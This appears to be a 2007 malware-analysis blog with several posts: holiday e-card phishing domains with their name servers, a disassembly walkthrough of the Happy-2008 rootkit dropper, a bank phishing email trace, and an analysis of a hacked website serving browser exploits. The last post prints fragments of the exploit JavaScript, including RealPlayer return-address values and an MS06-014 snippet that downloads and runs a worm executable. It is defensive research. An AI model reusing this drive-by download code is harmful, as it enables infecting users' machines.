[Malware] The Phishing Storm of 2008

December 30, 2007

Caution the following post contains explicit malware content, be careful!!!!

As every end of year Web registers a significative incrase of Malware attacks over various fronts, in particular WebSite Phishing Frauds, File Infection and New Rootkits.

This information can be verified by consulting http://www.antiphishing.org/

Obviously 90% of Frauds comes from fake Websitesin topic with the current Holidays, such as Christmas Gifts, E-Card / Postcard Online services. In the last days for example I’ve founded two phishing E-Card WebSites:

familypostcards2008.com

uhavepostcard.com

Let’s lookup the first WebSite:

———————————

Domain name:             UHAVEPOSTCARD.COM
Name Server:             ns.uhavepostcard.com 74.66.92.4
Name Server:             ns10.uhavepostcard.com 193.150.206.29
Name Server:             ns11.uhavepostcard.com 24.151.246.25
Name Server:             ns12.uhavepostcard.com 78.60.126.188
Name Server:             ns13.uhavepostcard.com 78.60.126.188
Name Server:             ns2.uhavepostcard.com 71.11.228.181
Name Server:             ns3.uhavepostcard.com 76.236.158.155
Name Server:             ns4.uhavepostcard.com 76.226.91.98
Name Server:             ns5.uhavepostcard.com 68.45.61.150
Name Server:             ns6.uhavepostcard.com 65.35.110.50
Name Server:             ns7.uhavepostcard.com 67.58.159.109
Name Server:             ns8.uhavepostcard.com 70.92.107.11
Name Server:             ns9.uhavepostcard.com 12.216.86.166
Creation Date:           2007.12.23
Updated Date:            2007.12.24
Expiration Date:         2008.12.23
---------------------------------
Domain name:             FAMILYPOSTCARDS2008.COM
Name Server:             ns.familypostcards2008.com 71.130.195.9
Name Server:             ns10.familypostcards2008.com 86.137.196.186
Name Server:             ns11.familypostcards2008.com 78.60.126.188
Name Server:             ns12.familypostcards2008.com 76.174.52.123
Name Server:             ns13.familypostcards2008.com 71.230.66.163
Name Server:             ns2.familypostcards2008.com 76.205.135.226
Name Server:             ns3.familypostcards2008.com 75.9.137.204
Name Server:             ns4.familypostcards2008.com 76.206.232.36
Name Server:             ns5.familypostcards2008.com 98.201.54.7
Name Server:             ns6.familypostcards2008.com 69.247.162.86
Name Server:             ns7.familypostcards2008.com 74.161.36.118
Name Server:             ns8.familypostcards2008.com 12.217.82.249
Name Server:             ns9.familypostcards2008.com 193.150.206.29
Creation Date:           2007.12.29
Updated Date:            2007.12.29
Expiration Date:         2008.12.29

———————————

Its truly curious that these domains comes from Los Angeles and are created only for these hollidays :)

The spreaded malware is always the same but in different forms:

  • happy_2008.exe
  • Happy2008.exe
  • stripshow.exe
  • happynewyear2008.exe

So pay attention to these Postcard sites.. ;)

Regard,

Evilcry


[MALWARE] Happy-2008.exe Win32.Zhelatin.pk Rootkit

December 29, 2007

Happy-2008 seems to be a new kind of virus, created in occasion of
new year.

Its spreaded in form of Executable, not packed or PE Tricked.
It can be downloaded from an E-Card WebSite.

At the actual state seems that AVs does not detects it, only someone
show it as Suspect-Zipped-File.

.:: The Essay :..
Gets the Current System Directory and next sets up as working directory
/system32.
Next with GetFullPathNameA retrives “C:\WINDOWS\System32\init_sys.config

If file exists tries to determine its attributes, else creates a file

0040126A  PUSH EBX                                 ; /hTemplateFile => NULL
0040126B  PUSH 80                                  ; |Attributes = NORMAL
00401270  PUSH 2                                   ; |Mode = CREATE_ALWAYS
00401272  PUSH EBX                                 ; |pSecurity => NULL
00401273  PUSH 7                                   ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE|4
00401275  PUSH 40000000                            ; |Access = GENERIC_WRITE
0040127A  LEA EAX,DWORD PTR SS:[EBP-114]           ; |
00401280  PUSH EAX                                 ; |FileName = “C:\WINDOWS\System32\init_sys.config”
00401281  CALL DWORD PTR DS:[<&KERNEL32.CreateFile>; \CreateFileA

00401293  PUSH ESI ;Points to an Embedded Executable
00401294  PUSH EDI
00401295  MOV EDI,DWORD PTR DS:[<&KERNEL32.WriteFi>;  kernel32.WriteFile
0040129B  PUSH 0
0040129D  LEA EAX,DWORD PTR SS:[EBP-C] ;System Path
004012A0  PUSH EAX
004012A1  LEA ESI,DWORD PTR DS:[EBX+422A98] ; [config] String
004012A7  PUSH DWORD PTR DS:[ESI]

A file “init_sys.config” is created and filled with three entries:
[config]
[local]
[peers]
Successively, a series of values are attached into this config file, immediately after
[peers] and have this form:

00003D6C8F338A3FDD3DF3648666F55C=0CCFC042170F00

0040132D  CALL happy-20.0040122D       ;Builds init_sys.config and fill it
00401332  LEA ECX,DWORD PTR SS:[EBP-8]
00401335  CALL happy-20.004016E8

00401351  CALL happy-20.00401634 ;EAX = String obtained from GetSystemTime Output

After some calls, EAX points to a new string “init_1a30-12f1″

00401391   PUSH EAX                                 ; /pFilenameInPath
00401392   PUSH DWORD PTR SS:[EBP-8]                ; |Path
00401395   PUSH EBX                                 ; |MaxPathSize
00401396   PUSH DWORD PTR SS:[EBP-4]                ; |FileName
00401399   CALL DWORD PTR DS:[<&KERNEL32.GetFullPat>; \GetFullPathNameA
0040139F   PUSH happy-20.004020D4                   ;  ASCII “.sys”
004013A4   LEA ECX,DWORD PTR SS:[EBP-8]
004013A7   CALL happy-20.00401108

Inside the call 00401108 a new string is assembled “init_1a30-12f1.sys”
please note that the numerical part of the Sys file, changes at every run
because it depends from GetSystemTime output.

004013B1   PUSH ESI ;NULL
004013B2   PUSH ESI ;NULL
004013B3   CALL OpenSCManagerA
004013B9   CMP EAX,ESI
004013BB   MOV DWORD PTR SS:[EBP-C],EAX
004013BE   JE happy-20.004014D9

After opening Service Manager for LocalHost, Service Status is enumerated and:

00401407  PUSH DWORD PTR SS:[EBP-18]             ; /Arg3
0040140A  PUSH EDI                               ; |Arg2
0040140B  PUSH DWORD PTR DS:[EBX]                ; |Arg1 = 0012FE62 ASCII “Abiosdsk”
0040140D  CALL happy-20.00401579                 ; \happy-20.00401579

This Call compares the Services Name presents in the sistem, with ‘init_’

abp480n5,ACPI,adpu16, etc..

After this check an GetLastError is called:

0040142E  JNZ SHORT happy-20.0040143D
00401430  CALL GetLastError
00401436  CMP EAX,0EA
0040143B  JE SHORT happy-20.004013D1

If the Service exists and is running, the task of happy_2008 ends here.
Else, a copy of a Device Driver is extracted from the executable and runned as
Kernel’s Service.

I’ve extracted that device driver with an HexEditor, it starts at 00403018 and ends at
00424FF8.

This rootkit hides itself, but in the next part we will discover what that what it
does :)

See you to the Second  part.. :)


(Merry Christmas || Happy Sol Invictus)

December 24, 2007

Merry Christmas!!!!!!!

May this Christmas be full of Peace and Serenity for You and Your Families..

 Regards,

Evilcry


The Thousands Ways of SPAM [CartaSi Fraud]

December 22, 2007

Hi,

As everyday also this morning I’ve checked my HoneyPot-MailAddress, and a curious mail message reatched me, this is the Original Recipient:

Gentile Cliente,

Il codice dispositivo del suo conto on-line e stato inserito incorretto piu di tre volte.
Per proteggere suo conto abbiamo sospeso il acceso.
Per recuperare il acceso prego di entrare e completare la pagina di attivazione.

Grazie ancora per aver scelto i servizi on-line di CartaSi.
I migliori saluti.

Servizio Clienti CartaSi
****************************************************************
VUOLE CONTESTARE SU UNA SPESA?

Easy Claim il servizio che fa per lei!

****************************************************************

Per favore, non risponda a questa mail: per eventuali comunicazioni, acceda al Portale Titolari (http://www.cartasi.it//) e ci scriva attraverso ‘Lo sportello del Cliente’: e’ il modo piu’ semplice per ottenere una rapida risposta dai nostri operatori.
Grazie della collaborazione.
++++++++++++++++++++++++++++++++++

CartaSi is a Bank service, but is really strange that Subject has Grammar Errors, let’s trace the first link with Malzilla..

WebSite: http://aquarossall.plus.com/

First operation is a Whois to this strange link that expose Music’s Albums Covers..

—————

Website Title: PlusNet | Home & Business Broadband Internet Access & Phone Services UK
Title Relevancy 77%

—————————————

The links comes from PlusNet Network Malzilla detects also a Bridge of Redirections:

–> djtees.com/
–> djtees.com/tshop/store/default.asp?idAffiliate=
Redirection to index.asp –> djtees.com/tshop/store/index.asp
Website is not dangerous, but is surely boring to see these stupid forms of Spam .

See you to the next post.. :)


[MALWARE] Multiple Malware and Exploits on a Chinese WebSite

December 20, 2007

Hi,

A new virus similar to 31joy.com/rb.vg attacked some WebSites (one in particular {CENSORED}.biz), it appears to change the IP address of infected machines to the gateway address, throwing the local network into chaos and infecting additional machines.

Victims that browse this WebSite, are firstly Exploited (if poorly harmored) and successively infected by Adware and Spyware.

I’ve analysed the WebSite, with Malzilla, infection is a classical one, inserts malicious code at the top of pages, so when a Victim visits the site 4 Infected Iframes are loaded, and some ‘.js‘ and ‘.cab‘ are downloaded.

hxxp://{CENSORED}.biz/index.html
hxxp://{CENSORED}.biz/2.htm
hxxp://{CENSORED}.biz/xl.htm

http://{CENSORED}.php?id{CENSORED}we{CENSORED}=pic1

Let’s analyse the First IFrame, a .js is loaded:function RealExploit()
{
var user = navigator.userAgent.toLowerCase();
if(user.indexOf(“msie 6″)==-1&&user.indexOf(“msie 7″)==-1)

[...]

else if(RealVersion == “6.0.14.544″)
ret = unescape(“%63%11%08%60″);
else if(RealVersion == “6.0.14.550″)
ret = unescape(“%63%11%04%60″);
else if(RealVersion == “6.0.14.552″)
ret = unescape(“%79%31%01%60″);
else if(RealVersion == “6.0.14.543″)
ret = unescape(“%79%31%09%60″);
else if(RealVersion == “6.0.14.536″)
ret = unescape(“%51%11%70%63″);

[...]

}

It’s clear that the first IFrame launches the famous RealTime Exploit that allows Remote Code Execution.

Second IFrame, 2.htm conducts to another JavaScript:

function init()
{

var ado=(document.createElement(“object”));
ado.setAttribute(“classid”,”clsid:BD96C556-65A3-11D0-983A-00C04FC29E36“);

This CLSID is suspicious let’s search about it, its another common Exploit: RDS.DataStore – Data Execution (CVS-2006-0003 / MS06-14), the IFrame itself loads others Objects:
0614.js
MPS.js
PowerPlayerCtrl.js

4.CAB -> that contains bd.exe OR r.exe and is Worm/Cekar.A

Let’s see the first 0614.js :

var url=”http://{CENSORED}/real.exe”;
[...]
xml.Open(“GET”,url,0);
xml.Send();
as.type=1;
as.open();
as.write(xml.responseBody);
path=”..\\ntuser.com”;
as.savetofile(path,2);
as.close();
var shell=ado.createobject(“Shell.Application”,””);
shell.ShellExecute(“cmd.exe”,”/c ” + path,””,”open”,0)}
[...]
The previous Data Execution exploit, calls this JavaScript that downloads and executes real.exe, that is obviously a Virus, Win32.Worm.Cekar..

W32/Cekar-A includes functionality to download code from a preconfigured website to the local disk.

When first run W32/Cekar-A creates the following files:

\setup.exe
<System>\internat.exe
\autorun.inf

–> Third IFrame xl.htm

Calls clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F which is another exploit that attempts to exploit a buffer overflow vulnerability in Xunlei Thunder PPLAYER.DLL_1_WORK ActiveX control, this leads to another Remote Code Execution.

–> Last IFrame, seems to be only a counter

See you to the next post! :)


Crypto Reverse Engineering Speech

December 18, 2007

Hi,

I’m working for a Chat-Conference Speech, on Cryptography and Reverse Engineering, for the Reversity program promoted by Reteam.

Obviously i accept suggestions and topics to talk about :)

First Reversity Session: POSTPONED to Sunday Jan 6 2008 12:00 EST (GMT-5) or 17:00 GMT 

On EFNet chan: #reversity

In the next days I’ll publish here the Talk Index

See you to the next post.. :)


RBN (Russian Bank Network) Analysis

December 7, 2007

Hi,

There are some places in the world where life is dangerous. Internet has some dark zones too and RBN is one of them. RBN stands for Russian Business Network and it’s a nebulous organisation which aims to fulfil cyber crime.

This study aims to provide some enlightenment on RBN activities and tries to detail how they work. Indeed RBN has many constituents and it’s hard to have an exact idea on the goal of some of them and the way they’re linked with other constituents.
There are some countermeasures available but they don’t make sense for home users or even companies. Only ISPs, IXPs and internet regulators can help mitigating risks originating from RBN and other malicious groups.

http://research-labs.net/news/13-Russian+Business+Network+study.html

http://www.bizeul.org/files/RBN_study.pdf

See you to the next post.. :)


Follow

Get every new post delivered to your Inbox.